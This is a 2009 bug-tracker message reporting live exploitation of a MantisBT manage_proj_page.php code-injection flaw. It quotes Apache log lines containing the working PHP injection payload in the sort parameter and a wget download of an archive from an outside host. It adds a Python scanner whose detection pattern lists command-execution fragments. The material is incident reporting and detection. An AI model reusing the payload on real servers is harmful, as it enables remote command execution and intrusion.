[Bug 345988] Re: security issues with manage_proj_page.php
Christian Schulze
lynx at quantentunnel.de
Mon Apr 6 13:11:28 UTC 2009
This bug has been actively exploited on a Hardy machine running Mantis 1.0.6 on Feb 4th 2009, as was noticed today.
Because of the LTS for Hardy, the vendor patch should be applied here too.
<APACHE LOG>
IP - - [04/Feb/2009:19:32:48 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 302 - "-" "-"
IP - - [04/Feb/2009:19:32:49 +0100] "POST /mantis/login.php HTTP/1.0" 302 - "-" "-"
IP - - [04/Feb/2009:19:32:50 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3350 "-" "-"
IP - - [04/Feb/2009:19:32:53 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3218 "-" "-"
IP - - [04/Feb/2009:19:33:01 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3605 "-" "-"
IP - - [04/Feb/2009:19:33:19 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3809 "-" "-"
--19:33:01-- http://www.freewebs.com/spaniola/new.tgz
=> `new.tgz'
Resolving www.freewebs.com... 204.2.183.2
Connecting to www.freewebs.com|204.2.183.2|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 248,497 (243K) [application/x-tar]
0K .......... .......... .......... .......... .......... 20% 58.65 KB/s
50K .......... .......... .......... .......... .......... 41% 58.78 KB/s
100K .......... .......... .......... .......... .......... 61% 51.43 KB/s
150K .......... .......... .......... .......... .......... 82% 43.37 KB/s
200K .......... .......... .......... .......... .. 100% 45.68 KB/s
19:33:07 (50.96 KB/s) - `new.tgz' saved [248497/248497]
</APACHE LOG>
The problem seems to be fixed in version 1.1.4.
Intrepid is shipping 1.1.2. Has the vendor patch been applied to that version?
--
security issues with manage_proj_page.php
https://bugs.launchpad.net/bugs/345988
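As an added example (not code from the bug report or from MantisBT), a small Python checker that applies to Apache access-log lines like those quoted above the allowlist a defender would expect for the sort parameter: a legitimate sort value is a bare column identifier, so anything else on manage_proj_page.php is flagged, and the PHP fragments seen in the log are called out specifically. The sample lines and IP addresses are constructed.

```python
import re
from urllib.parse import unquote

# Apache common/combined log line; only the request fields are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# A legitimate MantisBT sort column is a bare identifier; anything else is suspicious.
SAFE_SORT = re.compile(r'^[A-Za-z0-9_]+$')

# Fragments of the injected PHP seen in the log above, matched after URL-decoding.
CODE_MARKERS = ("passthru(", "base64_decode(", "$_SERVER[", "error_reporting(", "eval(", "system(")

def sort_param(target):
    """Return the URL-decoded 'sort' query value of a request target, or None."""
    if "?" not in target:
        return None
    for pair in target.split("?", 1)[1].split("&"):
        key, _, value = pair.partition("=")
        if key == "sort":
            return unquote(value)
    return None

def classify_request(target):
    """'code-injection', 'unexpected-sort', or None for a request target."""
    if not target.split("?", 1)[0].endswith("/manage_proj_page.php"):
        return None
    value = sort_param(target)
    if value is None or SAFE_SORT.match(value):
        return None
    if any(marker in value for marker in CODE_MARKERS):
        return "code-injection"
    return "unexpected-sort"

def scan(lines):
    """Return (ip, time, status, verdict) for every suspicious manage_proj_page.php hit."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        verdict = classify_request(m.group("target"))
        if verdict:
            findings.append((m.group("ip"), m.group("time"), int(m.group("status")), verdict))
    return findings

# Constructed sample lines modelled on the log above (placeholder IPs; %23 decodes to '#').
SAMPLE_LOG = [
    '10.0.0.1 - - [04/Feb/2009:19:32:48 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 302 - "-" "-"',
    '10.0.0.1 - - [04/Feb/2009:19:32:50 +0100] "GET /mantis/manage_proj_page.php?sort=\']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3350 "-" "-"',
    '10.0.0.2 - - [04/Feb/2009:19:40:00 +0100] "GET /mantis/manage_proj_page.php?sort=name HTTP/1.0" 200 3350 "-" "-"',
    '10.0.0.3 - - [04/Feb/2009:19:41:00 +0100] "GET /mantis/manage_proj_page.php?sort=name%20desc HTTP/1.0" 200 3350 "-" "-"',
]
```

Run `scan(SAMPLE_LOG)` over a real access log to get one tuple per suspicious request; the 200 status on the flagged line is what distinguishes a successful hit from a rejected one.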